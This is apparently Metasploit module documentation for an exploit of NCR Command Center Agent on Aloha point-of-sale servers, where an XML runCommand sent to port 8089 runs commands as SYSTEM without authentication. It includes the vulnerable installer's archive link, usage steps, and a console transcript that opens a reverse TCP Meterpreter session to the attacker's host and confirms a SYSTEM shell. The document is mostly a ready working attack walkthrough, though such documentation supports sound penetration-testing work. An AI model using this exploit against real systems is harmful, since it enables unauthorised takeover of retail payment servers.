documentation/modules/exploit/windows/misc/ncr_cmcagent_rce.md
CMCAgent in NCR Command Center Agent 16.3 on Aloha POS/BOH servers permits the submission of a runCommand parameter (within an XML document sent to port 8089) that enables the remote, unauthenticated execution of an arbitrary command as SYSTEM, as exploited in the wild in 2020 and/or 2021. NOTE: the vendor's position is that exploitation occurs only on devices with a certain "misconfiguration."
Successfully tested against NCR Command Center Agent 16.2.1.1
The original link is https://rdf2.alohaenterprise.com/client/CMCInst.zip. Since the URL was inaccessible, the file was downloaded using the Web Archive. Here’s the final URL:
https://web.archive.org/web/20210129020048/https://rdf2.alohaenterprise.com/client/CMCInst.zip
use windows/misc/ncr_cmcagent_rceset rhosts [ip]set lhost [ip]runmsf > use windows/misc/ncr_cmcagent_rce
[*] Using configured payload windows/meterpreter/reverse_tcp
msf exploit(windows/misc/ncr_cmcagent_rce) > set LHOST 192.168.2.107
LHOST => 192.168.2.107
msf exploit(windows/misc/ncr_cmcagent_rce) > set RHOSTS 192.168.2.106
RHOSTS => 192.168.2.106
msf exploit(windows/misc/ncr_cmcagent_rce) > exploit
[*] Started reverse TCP handler on 192.168.2.107:4444
[*] 192.168.2.106:8089 - Generating payload
[*] 192.168.2.106:8089 - Check your shell
[*] Sending stage (177734 bytes) to 192.168.2.106
[*] Meterpreter session 1 opened (192.168.2.107:4444 -> 192.168.2.106:49849) at 2025-10-23 05:38:45 -0400
meterpreter > shell
Process 5188 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19044.4529]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system